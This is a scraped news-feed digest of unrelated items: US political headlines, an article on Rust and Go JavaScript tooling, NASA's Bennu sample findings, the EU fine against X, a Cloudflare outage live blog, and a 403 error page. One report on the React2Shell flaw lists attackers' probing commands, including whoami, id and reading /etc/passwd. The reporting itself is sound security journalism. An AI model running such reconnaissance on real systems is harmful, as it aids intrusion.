A federal grand jury in Virginia has declined a second attempt by the Justice Department to indict New York Attorney General Letitia James on charges that she lied in her mortgage application. In a statement, Letitia James wrote, “As I have said from the start, the charges against me are baseless. It is time for this unchecked weaponization of our justice system to stop.” It’s the latest defeat for President Trump’s campaign of retribution against his political enemies. The Trump administration is reportedly considering a third attempt to obtain an indictment against James.

Protesters Ejected from New Orleans City Council Meeting After Demanding “ICE-Free Zones”

Dec 05, 2025

Image Credit: New Orleans City Council

In New Orleans, about 30 activists were ejected from a City Council meeting Thursday after calling for “ICE-free zones” and asking local leaders to do more to protect immigrants. During a public comment period, members of the public went to the microphone one by one and were cut off when it became clear they wanted to speak on immigration, which wasn’t on the formal agenda.

Brittany Cary: “And I’m asking City Council for ICE-free zones. Make all city-owned property ICE-free zones, and prohibit ICE and DHS from using city property to stage their operations. No collaboration with ICE. City Council must pass ordinances that codify noncollaboration” —

Chair: “Ma’am?”

Brittany Cary: — “between the city of New Orleans and ICE, including all of its offices and” —

Chair: “As I stated previously, that is not germane. Thank you for your comments.”

The protests came as the Border Patrol announced a surge of more than 200 federal immigration agents into New Orleans, which the agency is calling “Operation Catahoula Crunch.” They aim to make 5,000 arrests over two months. We’ll go to New Orleans later in the broadcast.

Honduran Presidential Candidate Nasralla Blames Trump’s Interference as Opponent Takes Lead

Dec 05, 2025

Honduran presidential candidate Salvador Nasralla has alleged fraud after his conservative rival Nasry Asfura regained the lead, as election officials continue to tally votes from Sunday’s election. Nasralla also accused President Trump of interfering in the race by publicly backing Asfura. Some election officials have also publicly criticized the election process. On Thursday, Marlon Ochoa, who serves on Honduras’s National Electoral Council, decried what he called an electoral “coup.” He said, “I believe there is unanimity among the Honduran people that we are perhaps in the least transparent election in our democratic history.”

Trump Hosts Leaders of DRC and Rwanda in D.C. as U.S. Signs Bilateral Deals on Minerals

Dec 05, 2025

President Trump welcomed the leaders of the Democratic Republic of Congo and Rwanda to Washington, D.C., Thursday for the signing of an agreement aimed at ending decades of conflict in the eastern DRC . Trump also announced the U.S. had agreed to bilateral deals that will open the African nations’ reserves of rare earth elements and other minerals to U.S. companies. The signing ceremony was held in the newly renamed Donald J. Trump Institute of Peace.

Trump Struggles to Stay Awake in Another Public Event, Adding to Speculation over His Health

Dec 05, 2025

During Thursday’s event, Trump struggled to keep his eyes open. This follows other recent public appearances where Trump appeared to fall asleep at times. And once again, Trump was spotted wearing bandages on his right hand, which appeared bruised and swollen. That fueled further speculation about the president’s health. On Monday, the White House said the results from Trump’s recent MRI exam were “perfectly normal,” after Trump was unable to tell reporters aboard Air Force One what part of his body was scanned.

Reporter: “What part of your body was the MRI looking at?”

President Donald Trump: “I have no idea. It was just an MRI. What part of the body? It wasn’t the brain, because I took a cognitive test, and I aced it. I got a perfect mark, which you would be incapable of doing. Goodbye, everybody. You, too.”

Netflix Announces $72 Billion Deal to Buy Warner Bros. Discovery

Dec 05, 2025

In business news, Netflix has announced it will buy Warner Bros. in a deal worth at least $72 billion. The deal could reshape the entertainment and media industry, as it will give Netflix control of Warner’s movie and TV studios, as well as the HBO Max streaming service.

12 Arrested as Striking Starbucks Workers Hold Sit-In Protest at Empire State Building

Dec 05, 2025

Image Credit: X/@FightForAUnion

In labor news, a dozen striking Starbucks workers were arrested in New York City Thursday as they blocked the doors to the Empire State Building, where Starbucks has a corporate office. Starbucks workers at over 100 stores are on strike.

Judge Sentences California Animal Rights Activist to 90 Days in Jail for Freeing Abused Chickens

Dec 05, 2025

A University of California student has been ordered to serve 90 days in jail for breaking into a Sonoma County poultry slaughterhouse and freeing four chickens. Twenty-three-year-old Zoe Rosenberg of Berkeley received the sentence on Wednesday, after a jury convicted her in October of felony conspiracy and three misdemeanor counts. She was ordered to pay more than $100,000 to Petaluma Poultry, which is owned by the agribusiness giant Perdue Farms. Rosenberg’s supporters with the group Direct Action Everywhere say the chickens she rescued were worth $24; they’re reportedly alive and well at a sanctuary for rescued farm animals. Rosenberg told supporters her action was prompted by investigations that found routine violations of California’s animal cruelty laws at Petaluma Poultry slaughterhouses.

Zoe Rosenberg: “We found that there were dead birds among the living, that the air quality was so poor that chickens were struggling to breathe. I myself was struggling to breathe even with a KN95 mask as I investigated this facility. … And we have been calling on the California attorney general to take action, because the Sonoma County District Attorney’s Office has made it abundantly clear that they do not care about these animals whatsoever, that they care far more about the profits of Perdue, a company that makes over $10 billion a year on the backs of these animals.”

National Park Service Prioritizes Free Entry on Trump’s Birthday Over Juneteenth and MLK Holidays

Dec 05, 2025

The Trump administration has ended a policy granting visitors free access to national parks on the Juneteenth and Martin Luther King Jr. Day holidays. Instead, the 116 parks that charge entrance fees will now waive admission charges on June 14 — President Trump’s birthday.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.


The Performance Revolution in JavaScript Tooling

Lobsters
blog.appsignal.com
2025-12-05 12:43:01
Comments...
Original Article

Over the last couple of years, we've witnessed a remarkable shift in the JavaScript ecosystem, as many popular developer tools have been rewritten in systems programming languages like Rust, Go, and Zig.

This transition has delivered dramatic performance improvements and other innovations that are reshaping how developers build JavaScript-backed applications.

In this article, we'll explore the driving forces behind this revolution, its implications for the wider ecosystem, and some of the most impactful projects leading the charge.

The shift toward building JavaScript tooling in systems languages is a response to real, mounting pressure in the ecosystem. While JavaScript engines have become remarkably fast over the years, the language itself wasn't designed for CPU-heavy workloads.

Modern JavaScript applications aren't just a few scripts anymore — they're sprawling codebases with thousands of dependencies, complex module graphs, and extensive build pipelines.

JavaScript-based tools that were once "good enough" now struggle to keep up, leading to sluggish build times, laggy editor experiences, and frustratingly slow feedback loops.

That's where languages like Rust and Go come in. They offer native performance, better memory management, and efficient concurrency — all of which translate into tooling that's not just faster, but more reliable and scalable.

Rust, in particular, with its seemingly cult-like following, has become the language of choice for much of this new wave. Its growing popularity has inspired a new generation of developers who care deeply about correctness, speed, and user experience. This has created a virtuous cycle where we get more tools and faster innovation.

All of this points to a broader realization in the JavaScript world: if we want tooling that scales with the demands of modern development, we have to look beyond JavaScript itself.

Let's look at some of the most influential and promising tools redefining the JavaScript developer experience: SWC, ESBuild, BiomeJS, Oxc, FNM/Volta, and TypeScript in Go.

1. SWC

SWC was among the first major JavaScript tools written in a language other than JavaScript itself (Rust), thus establishing a pattern that many others would follow.

At its core, it provides a high-performance platform for JavaScript/TypeScript transpilation, bundling, minification, and transformation through WebAssembly.

It has been largely successful in its goal of serving as a drop-in replacement for Babel, delivering transpilation speeds up to 20x faster while maintaining broad compatibility with most Babel configurations.
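
For a sense of the drop-in ergonomics, a minimal .swcrc along these lines replaces a typical Babel setup (illustrative, not exhaustive):

{
  "jsc": {
    "parser": { "syntax": "typescript", "tsx": true },
    "target": "es2020"
  },
  "minify": true
}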

2. ESBuild

At a time when most developer tools were still being written in JavaScript, the idea of using systems languages like Go or Rust was considered more of an experiment than a trend.

But ESBuild changed that. In many ways, it sparked a broader wave of interest in building faster, lower-level tools that could dramatically improve the developer experience.

Created by Evan Wallace (former CTO of Figma), ESBuild was purpose-built to replace legacy bundlers like Webpack and Rollup with a much faster, simpler alternative. It achieves 10–100x faster performance in tasks like bundling, minification, and transpilation due to its Go-backed architecture.

Its speed, minimal configuration, and modern architecture have influenced a generation of tools and helped shift expectations around what JavaScript tooling should feel like. For this reason it remains the most adopted non-JavaScript tool to date, with over 50 million weekly downloads on NPM.

ESBuild weekly downloads on NPM
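
The minimal-configuration claim is fairly literal; a production bundle is typically a single command (an illustrative invocation, not from the article):

esbuild src/app.ts --bundle --minify --sourcemap --outfile=dist/app.js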

3. BiomeJS

BiomeJS is an ambitious Rust-based project that combines code formatting and linting into a single high-performance JavaScript toolchain.

Originally a fork of the now-defunct Rome project, BiomeJS delivers significant performance improvements over its entrenched predecessors:

  • Its formatter is ~25 times faster than Prettier.
  • Its linter is over 15 times faster than ESLint.
  • It benefits from Rust's multi-threaded architecture for dramatic speed gains (up to ~100x faster depending on the hardware).

BiomeJS simplifies the development workflow by consolidating these functions into a unified configuration system, eliminating the need to manage separate tools with overlapping functionality.
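
A single biome.json along these lines stands in for separate Prettier and ESLint configs (a minimal sketch; real projects will set more options):

{
  "formatter": { "enabled": true, "indentStyle": "space" },
  "linter": { "enabled": true, "rules": { "recommended": true } }
}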

Though it's still catching up to its more established counterparts in language support and extensibility, it is an increasingly attractive option for anyone seeking better performance and simpler tooling.

4. Oxc

A newer entrant to the field, Oxc is a collection of Rust-based JavaScript tools focusing on linting, formatting, and transforming JavaScript/TypeScript code.

It is part of the VoidZero project founded by Evan You (creator of Vue.js and Vite), and aims to be the backbone of the next generation of JavaScript tooling.

Oxc's headline features include:

  • A JavaScript parser that's 3x faster than SWC.
  • A TypeScript/JSX transformer that's 20x to 50x faster than Babel.
  • An ESLint-compatible linter that runs significantly faster (~50–100x).

oxlint has been a massive win for us at Shopify. Our previous linting setup took 75 minutes to run, so we were fanning it out across 40+ workers in CI. By comparison, oxlint takes around 10 seconds to lint the same codebase on a single worker, and the output is easier to interpret. We even caught a few bugs that were hidden or skipped by our old setup when we migrated!

— Jason Miller, creator of Preact
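
Trying oxlint on a codebase is itself a one-liner; by default it lints the current directory (typical usage, not from the article):

npx oxlint@latest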

5. FNM/Volta

Modern Node.js version management has greatly improved with tools like Fast Node Manager (fnm) and Volta, which are compelling alternatives to NVM. Another option is Mise, which supports Node.js along with many other development tools.

These Rust-based tools offer significantly faster shell initialization times and full cross-platform support with a much smaller memory footprint.

They address long-standing pain points in NVM, such as sluggish startup and lack of Windows compatibility, while adding conveniences like per-project version switching and seamless global package management.
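
Day-to-day usage is similarly lightweight. Typical commands, assuming a version is pinned in a version file or package.json:

# fnm: install and activate the version pinned in .nvmrc / .node-version
fnm install
fnm use

# Volta: pin the project's Node version in package.json
volta pin node@20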

6. TypeScript in Go

Perhaps the most surprising development in recent months is Microsoft’s work on porting TypeScript’s compiler to Go.

While it's still in active development, preliminary benchmarks already show remarkable improvements in build times (~10x for VS Code's codebase), editor startup speeds, and memory usage.

This native port addresses TypeScript's scaling challenges in large codebases, where developers previously had to compromise between snappy editor performance and rich type feedback.

While some viewed the choice of Go over Rust as a missed opportunity, given the latter's dominance in modern JavaScript tooling, the rationale behind this decision aligns well with the project's practical goals:

The existing code base makes certain assumptions – specifically, it assumes that there is automatic garbage collection – and that pretty much limited our choices. That heavily ruled out Rust. I mean, in Rust you have memory management, but it’s not automatic; you can get reference counting or whatever you could, but then, in addition to that, there’s the borrow checker and the rather stringent constraints it puts on you around ownership of data structures. In particular, it effectively outlaws cyclic data structures, and all of our data structures are heavily cyclic.

— Anders Hejlsberg, creator of TypeScript

Microsoft intends to ship the Go-based implementation as TypeScript 7.0 in the coming months, but native previews are already available for experimentation.
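
At the time of writing, the previews ship on npm as @typescript/native-preview, which exposes a tsgo binary whose flags aim to mirror tsc (package and flag names here are as announced in Microsoft's preview posts, not guaranteed stable):

npm install -D @typescript/native-preview
npx tsgo --project ./tsconfig.json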

Beyond the clear performance gains, the rise of native tooling for JavaScript brings deeper, ecosystem-wide implications.

With many established and upcoming tools now relying on entirely different runtimes and ecosystems, contributing becomes less accessible to the majority of JavaScript developers.

At the same time, this shift may influence the skill sets that developers choose to pursue in the first place. While not everyone needs to write systems-level code, understanding how these languages work and what they make possible will drive even more innovative tooling in the coming years.

Unsurprisingly, although learning Rust or Zig presents a steeper barrier to entry, developers overwhelmingly prefer faster tools (even if they're harder to contribute to).

Screenshot of Twitter Poll

One other subtle but important tradeoff is the loss of dogfooding, where tool creators stop using the language their tools serve, a practice that has historically kept them in tune with the experience they’re shaping.

Moving to a different implementation language can weaken that feedback loop, and while many projects are aware of this risk, the long-term impact of a lack of dogfooding remains an open question.

The tools covered here represent just a slice of the growing ecosystem of performance-focused, native-powered developer tools, and the momentum behind this new wave is undeniable.

Other notable efforts in this space include Turbopack and Turborepo (from Vercel), Dprint (a Prettier alternative), and even full-fledged runtimes like Bun (written in Zig) and Deno (Rust), which reimagine what's possible by rebuilding JavaScript infrastructure from the ground up.

Together, these tools reflect a broader shift in the JavaScript world that makes it clear that the future of JavaScript tooling is being written in Rust, Go, Zig, and beyond.

Wrapping Up

In this post, we explored several tools driving a new wave of performance and innovation across the JavaScript ecosystem.

The performance revolution in JavaScript tooling is a fascinating case study in ecosystem evolution.

Instead of being constrained by the limitations of JavaScript itself, the community has pragmatically embraced other languages to push the boundaries of what's possible.

Netflix to Acquire Warner Bros

Hacker News
about.netflix.com
2025-12-05 12:21:19
Comments...
Original Article

403 ERROR


Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.

Generated by cloudfront (CloudFront)
Request ID: tSxqIFLwq-zGt0UwyLUOUN3IqzK_QOVkLmdXIVOTFHQKsoqQW7LIDA==

Sugars, Gum, Stardust Found in NASA's Asteroid Bennu Samples

Hacker News
www.nasa.gov
2025-12-05 12:12:52
Comments...
Original Article

The asteroid Bennu continues to provide new clues to scientists’ biggest questions about the formation of the early solar system and the origins of life. As part of the ongoing study of pristine samples delivered to Earth by NASA’s OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, and Security-Regolith Explorer) spacecraft, three new papers published Tuesday by the journals Nature Geoscience and Nature Astronomy present remarkable discoveries: sugars essential for biology, a gum-like substance not seen before in astromaterials, and an unexpectedly high abundance of dust produced by supernova explosions.

Sugars essential to life

Scientists led by Yoshihiro Furukawa of Tohoku University in Japan found sugars essential for biology on Earth in the Bennu samples, detailing their findings in the journal Nature Geoscience. The five-carbon sugar ribose and, for the first time in an extraterrestrial sample, six-carbon glucose were found. Although these sugars are not evidence of life, their detection, along with previous detections of amino acids, nucleobases, and carboxylic acids in Bennu samples, shows that building blocks of biological molecules were widespread throughout the solar system.

For life on Earth, the sugars deoxyribose and ribose are key building blocks of DNA and RNA, respectively. DNA is the primary carrier of genetic information in cells. RNA performs numerous functions, and life as we know it could not exist without it. Ribose in RNA is used in the molecule’s sugar-phosphate “backbone” that connects a string of information-carrying nucleobases.

“All five nucleobases used to construct both DNA and RNA, along with phosphates, have already been found in the Bennu samples brought to Earth by OSIRIS-REx,” said Furukawa. “The new discovery of ribose means that all of the components to form the molecule RNA are present in Bennu.”

The discovery of ribose in asteroid samples is not a complete surprise. Ribose has previously been found in two meteorites recovered on Earth. What is important about the Bennu samples is that researchers did not find deoxyribose. If Bennu is any indication, this means ribose may have been more common than deoxyribose in environments of the early solar system.

Researchers think the presence of ribose and lack of deoxyribose supports the “RNA world” hypothesis, where the first forms of life relied on RNA as the primary molecule to store information and to drive chemical reactions necessary for survival.

“Present day life is based on a complex system organized primarily by three types of functional biopolymers: DNA, RNA, and proteins,” explains Furukawa. “However, early life may have been simpler. RNA is the leading candidate for the first functional biopolymer because it can store genetic information and catalyze many biological reactions.”

The Bennu samples also contained one of the most common forms of “food” (or energy) used by life on Earth, the sugar glucose, which is the first evidence that an important energy source for life as we know it was also present in the early solar system.

Mysterious, ancient ‘gum’

A second paper, in the journal Nature Astronomy, led by Scott Sandford at NASA’s Ames Research Center in California’s Silicon Valley and Zack Gainsforth of the University of California, Berkeley, reveals a gum-like material in the Bennu samples never seen before in space rocks – something that could have helped set the stage on Earth for the ingredients of life to emerge. The surprising substance was likely formed in the early days of the solar system, as Bennu’s young parent asteroid warmed.

Once soft and flexible, but since hardened, this ancient “space gum” consists of polymer-like materials extremely rich in nitrogen and oxygen. Such complex molecules could have provided some of the chemical precursors that helped trigger life on Earth, and finding them in the pristine samples from Bennu is important for scientists studying how life began and whether it exists beyond our planet.


Bennu’s ancestral asteroid formed from materials in the solar nebula – the rotating cloud of gas and dust that gave rise to the solar system – and contained a variety of minerals and ices. As the asteroid began to warm, due to natural radiation, a compound called carbamate formed through a process involving ammonia and carbon dioxide. Carbamate is water soluble, but it survived long enough to polymerize, reacting with itself and other molecules to form larger and more complex chains impervious to water. This suggests that it formed before the parent body warmed enough to become a watery environment.

“With this strange substance, we’re looking at, quite possibly, one of the earliest alterations of materials that occurred in this rock,” said Sandford. “On this primitive asteroid that formed in the early days of the solar system, we’re looking at events near the beginning of the beginning.”

Using an infrared microscope, Sandford’s team selected unusual, carbon-rich grains containing abundant nitrogen and oxygen. They then began what Sandford calls “blacksmithing at the molecular level,” using the Molecular Foundry at Lawrence Berkeley National Laboratory (Berkeley Lab) in Berkeley, California. Applying ultra-thin layers of platinum, they reinforced a particle, welded on a tungsten needle to lift the tiny grain, and shaved the fragment down using a focused beam of charged particles.

When the particle was a thousand times thinner than a human hair, they analyzed its composition via electron microscopy at the Molecular Foundry and X-ray spectroscopy at Berkeley Lab’s Advanced Light Source. The ALS’s high spatial resolution and sensitive X-ray beams enabled unprecedented chemical analysis.

“We knew we had something remarkable the instant the images started to appear on the monitor,” said Gainsforth. “It was like nothing we had ever seen, and for months we were consumed by data and theories as we attempted to understand just what it was and how it could have come into existence.”

The team conducted a slew of experiments to examine the material’s characteristics. As the details emerged, the evidence suggested the strange substance had been deposited in layers on grains of ice and minerals present in the asteroid.

It was also flexible – a pliable material, similar to used gum or even a soft plastic. Indeed, during their work with the samples, researchers noticed the strange material was bendy and dimpled when pressure was applied. The stuff was translucent, and exposure to radiation made it brittle, like a lawn chair left too many seasons in the sun.

“Looking at its chemical makeup, we see the same kinds of chemical groups that occur in polyurethane on Earth,” said Sandford, “making this material from Bennu something akin to a ‘space plastic.’”

The ancient asteroid stuff isn’t simply polyurethane, though, which is an orderly polymer. This one has more “random, hodgepodge connections and a composition of elements that differs from particle to particle,” said Sandford. But the comparison underscores the surprising nature of the organic material discovered in NASA’s asteroid samples, and the research team aims to study more of it.

By pursuing clues about what went on long ago, deep inside an asteroid, scientists can better understand the young solar system – revealing the precursors to and ingredients of life it already contained, and how far those raw materials may have been scattered, thanks to asteroids much like Bennu.

Abundant supernova dust

Another paper in the journal Nature Astronomy, led by Ann Nguyen of NASA’s Johnson Space Center in Houston, analyzed presolar grains – dust from stars predating our solar system – found in two different rock types in the Bennu samples to learn more about where its parent body formed and how it was altered by geologic processes. It is believed that presolar dust was generally well-mixed as our solar system formed. The samples had six times as much supernova dust as any other studied astromaterial, suggesting the asteroid’s parent body formed in a region of the protoplanetary disk enriched in the dust of dying stars.

The study also reveals that, while Bennu’s parent asteroid experienced extensive alteration by fluids, there are still pockets of less-altered materials within the samples that offer insights into its origin.

“These fragments retain a higher abundance of organic matter and presolar silicate grains, which are known to be easily destroyed by aqueous alteration in asteroids,” said Nguyen. “Their preservation in the Bennu samples was a surprise and illustrates that some material escaped alteration in the parent body. Our study reveals the diversity of presolar materials that the parent accreted as it was forming.”

NASA’s Goddard Space Flight Center provided overall mission management, systems engineering, and the safety and mission assurance for OSIRIS-REx. Dante Lauretta of the University of Arizona, Tucson, is the principal investigator. The university leads the science team and the mission’s science observation planning and data processing. Lockheed Martin Space in Littleton, Colorado, built the spacecraft and provided flight operations. Goddard and KinetX Aerospace were responsible for navigating the OSIRIS-REx spacecraft. Curation for OSIRIS-REx takes place at NASA’s Johnson Space Center in Houston. International partnerships on this mission include the OSIRIS-REx Laser Altimeter instrument from CSA (Canadian Space Agency) and asteroid sample science collaboration with JAXA’s (Japan Aerospace Exploration Agency’s) Hayabusa2 mission. OSIRIS-REx is the third mission in NASA’s New Frontiers Program, managed by NASA’s Marshall Space Flight Center in Huntsville, Alabama, for the agency’s Science Mission Directorate in Washington.

For more information on the OSIRIS-REx mission, visit:

https://www.nasa.gov/osiris-rex

Karen Fox / Molly Wasser
Headquarters, Washington
202-285-5155 / 240-419-1732
karen.c.fox@nasa.gov / molly.l.wasser@nasa.gov

React2Shell critical flaw actively exploited in China-linked attacks

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 11:26:07
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed. [...]...
Original Article

React2Shell critical flaw actively exploited in China-linked attacks

Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed.

React2Shell is an insecure deserialization vulnerability in the React Server Components (RSC) 'Flight' protocol. Exploiting it does not require authentication and allows remote execution of JavaScript code in the server's context.

For the Next.js framework there was a separate identifier, CVE-2025-66478, but that tracking number was rejected in the National Vulnerability Database’s CVE list as a duplicate of CVE-2025-55182.

The security issue is easy to leverage, and several proof-of-concept (PoC) exploits have already been published, increasing the risk of related threat activity.

The vulnerability spans several versions of the widely used library, potentially exposing thousands of dependent projects. Wiz researchers say that 39% of the cloud environments they can observe are susceptible to React2Shell attacks.

React and Next.js have released security updates, but the issue is trivially exploitable without authentication and in the default configuration.

React2Shell attacks underway

A report from Amazon Web Services (AWS) warns that the Earth Lamia and Jackpot Panda threat actors linked to China started to exploit React2Shell almost immediately after the public disclosure.

"Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda," reads the AWS report .

AWS's honeypots also caught activity not attributed to any known clusters, but which still originates from China-based infrastructure.

Many of the attacking clusters share the same anonymization infrastructure, which further complicates individualized tracking and specific attribution.

Regarding the two identified threat groups, Earth Lamia focuses on exploiting web application vulnerabilities.

Typical targets include entities in the financial services, logistics, retail, IT, education, and government sectors across Latin America, the Middle East, and Southeast Asia.

Jackpot Panda targets are usually located in East and Southeast Asia, and its attacks are aimed at collecting intelligence on corruption and domestic security.

PoCs now available

Lachlan Davidson, the researcher who discovered and reported React2Shell, warned about fake exploits circulating online. However, exploits confirmed as valid by Rapid7 researcher Stephen Fewer and Elastic Security's Joe Desimone have appeared on GitHub.

The attacks that AWS observed leverage a mix of public exploits, including broken ones, along with iterative manual testing and real-time troubleshooting against targeted environments.

The observed activity includes repeated attempts with different payloads, Linux command execution (whoami, id), attempts to create files (/tmp/pwned.txt), and attempts to read '/etc/passwd'.

"This behavior demonstrates that threat actors aren't just running automated scans, but are actively debugging and refining their exploitation techniques against live targets," comment AWS researchers.

Attack surface management (ASM) platform Assetnote has released a React2Shell scanner on GitHub that can be used to determine if an environment is vulnerable to React2Shell.


Elon Musk’s X fined €120m by EU in first clash under new digital laws

Guardian
www.theguardian.com
2025-12-05 11:25:42
Ruling likely to put European Commission on collision course with billionaire, and possibly Donald Trump Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course wit...
Original Article

Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course with the US billionaire and potentially Donald Trump.

The breaches, under consideration for two years, included what the EU said was a “deceptive” blue tick verification badge given to users and the lack of transparency of the platform’s advertising.

The commission rules require tech companies to provide a public list of advertisers to ensure the company’s structures guard against illegal scams, fake advertisements and coordinated campaigns in the context of political elections.

In a third breach, the EU also concluded that X had failed to provide the required access to public data available to researchers, who typically keep tabs on contentious issues such as political content.

The ruling by the European Commission brings to a close part of an investigation that started two years ago.

The commission said on Friday it had found X in breach of transparency obligations under the Digital Services Act (DSA), in the first ruling against the company since the laws regulating the content of social media and large tech platforms came into force in 2023.

In December 2023, the commission opened formal proceedings to assess whether X may have breached the DSA in areas linked to the dissemination of illegal content and the effectiveness of the measures taken to combat information manipulation, for which the investigation continues.

Under the DSA, X can be fined up to 6% of its worldwide revenue, which was estimated to be between $2.5bn (£1.9bn) and $2.7bn in 2024.

Three other investigations remain, two of which relate to the content and the algorithms promoting content that changed after Musk bought Twitter in October 2022 and rebranded it X.

The commission continues to investigate whether there have been breaches of laws prohibiting incitement to violence or terrorism.

It is also looking into the mechanism for users to flag and report what they believe is illegal content.

Senior officials said the fine broke down into three sections: €45m for introducing a “verification” blue tick that users could buy, leaving others unable to determine the authenticity of account holders; €35m for breaches of ad regulations; and €40m for data access breaches in relation to research.

Before Musk took over Twitter, blue ticks were only awarded to verifiable account holders, including politicians, celebrities, public bodies and verified journalists in mainstream media and established new media, such as bloggers and YouTubers. After the takeover, users who subscribed to X Premium were then eligible for blue tick status.

Henna Virkkunen, who is the executive vice-president at the European Commission responsible for tech regulation, said: “With the DSA’s first non-compliance decision, we are holding X responsible for undermining users’ rights and evading accountability.

“Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU.”

The ruling risks enraging Trump’s administration. Last week the US commerce secretary, Howard Lutnick, said the EU must consider its tech regulations in order to get 50% tariffs on steel reduced.

skip past newsletter promotion

His threats were branded “blackmail” by Teresa Ribera, the EU commissioner in charge of Europe’s green transition and antitrust enforcement.

Senior EU officials said the ruling was independent of any pleadings by the US delegation in Brussels last week to meet trade ministers. They said the EU retained its “sovereign right” to regulate US tech companies, with 25 businesses including non-US companies such as TikTok coming under the DSA.

Musk – who is on a path to become the world’s first trillionaire – has 90 days to come up with an “action plan” to respond to the fine but ultimately he is also free to appeal against any EU ruling, as others, such as Apple, have done in the past, taking their case to the European court of justice.

At the same time, the EU has announced it has secured commitments from TikTok to provide advertising repositories to address the commission concerns raised in May about transparency.

The DSA requires platforms to maintain an accessible and searchable repository of the ads running on their services to allow researchers and representatives of civil society “to detect scams, advertisements for illegal or age-inappropriate”.

Senior officials said the phenomenon of fake political adverts or ads with fake celebrities cannot be studied unless the social media companies stick to the rules.

X has been approached for comment. The EU said the company had been informed of the decision.

Cloudflare outage hits major web services including X, LinkedIn and Zoom – business live

Guardian
www.theguardian.com
2025-12-05 11:19:46
Cloudflare reports it is investigating issues with Cloudflare Dashboard and related APIs Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning. Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudfl...
Original Article

Global websites down as Cloudflare investigates fresh issues

Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.

Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs” [application programming interfaces – used when apps exchange data with each other].

Cloudflare has also reported it has implemented a potential fix to the issue and is monitoring the results.

But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.

Last month, an outage at Cloudflare made many websites inaccessible for about three hours.


Jake Moore, global cybersecurity adviser at ESET, has summed up the problem:

“If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable.

“The problems often lie with the fact we are using an old network to direct internet users around the world to websites but it simply highlights there is one huge single point of failure in this legacy design.”

The Metro newspaper reports that shopping sites were affected by the Cloudflare IT problems too, such as Shopify, Etsy, Wayfair, and H&M.

H&M’s website is slow to load right now, but the other three seem to be working…

Today’s Cloudflare outage is likely to intensify concerns that internet users are relying on too few technology providers.

Tim Wright, technology partner at Fladgate, explains:

“Cloudflare’s latest outage is another reminder that much of the internet runs through just a few hands. Businesses betting on “always-on” cloud resilience are discovering its single points of failure. Repeated disruptions will draw tougher scrutiny from regulators given DORA, NIS2, and the UK’s emerging operational resilience regimes.

Dependence on a small set of intermediaries may be efficient but poses a structural risk the digital economy cannot ignore. We can expect regulators to probe the concentration of critical functions in the cloud and edge layers — while businesses rethink whether convenience has quietly outpaced control.”

Cloudflare: this was not an attack

Cloudflare’s System Status page shows that the problem that knocked many websites offline has been resolved.

Cloudflare insists the problem was not a cyber attack; instead, it appears to have been caused by a deliberate change to how its firewall handles data requests, made to fix a security vulnerability.

Cloudflare says:

This incident has been resolved.

A change made to how Cloudflare’s Web Application Firewall parses requests caused Cloudflare’s network to be unavailable for several minutes this morning. This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today.

Edinburgh Airport suspends all flights after IT issue with air traffic control

An IT issue affecting air traffic control has forced Edinburgh Airport to halt all flights today.

Edinburgh Airport said in a statement:

“No flights are currently operating from Edinburgh Airport.

“Teams are working on the issue and will resolve as soon as possible.”

The Airport’s departure page is showing eight flights delayed and five cancelled, but passengers for many other flights are being told to go to the gate.

Reports of problems at Cloudflare peaked at just after 9am UK time:

A chart showing reports of problems with Cloudflare Photograph: Downdetector

Online video conferencing service Zoom, and Transport for London’s website (used for travel information in the capital), are among the sites hit by the Cloudflare outage.


In a separate cereal supply and demand report, the FAO raised its global cereal production forecast for 2025 to a record 3.003 billion metric tons.

That’s up from 2.990 billion tons projected last month, mainly due to increased estimates for wheat output.

The FAO’s forecast for world cereal stocks at the end of the 2025/26 season has also been revised up to a record 925.5 million tons, reflecting expectations of expanded wheat stocks in China and India as well as higher coarse grain stocks in exporting countries.

World food prices fall for third month in a row

Global food prices have fallen for the third month running.

The UN’s Food Price Index, which tracks a basket of food commodities, dropped by 1.2% in November, thanks to a drop in the cost of dairy products, meat, sugar and vegetable oils.

That could help to push down inflation, if these reductions are passed on to consumers.

A chart showing world food prices
Photograph: UN FAO

However, cereal prices rose by 1.8% last month, due to “potential Chinese interest in supplies from the United States of America, concerns over continuing hostilities in the Black Sea region, and expectations of reduced plantings in the Russian Federation”, the UN’s Food and Agriculture Organisation reports.

Vegetable oil prices fell by 2.6% in the month, to a five-month low, due to falling prices of palm, rapeseed and sunflower oils.

Meat prices dropped by 0.8%, driven by lower pig and poultry meat prices and the removal of tariffs on beef imports into the US.

A chart showing world food prices
Photograph: UN FAO

Dairy prices fell by 3.1% in November, thanks to rising milk production and abundant export supplies in key producing regions, supported by ample butter and skim milk powder inventories in the European Union and seasonally higher output in New Zealand.

Sugar prices dropped by 5.9% in the month, and were almost 30% lower than a year ago, as expectations of ample global sugar supplies in the current season pushed down prices. Strong production in Brazil’s key southern growing regions, a good early season start to India’s harvest and favourable crop prospects in Thailand all contributed.

European shares higher ahead of US PCE inflation report

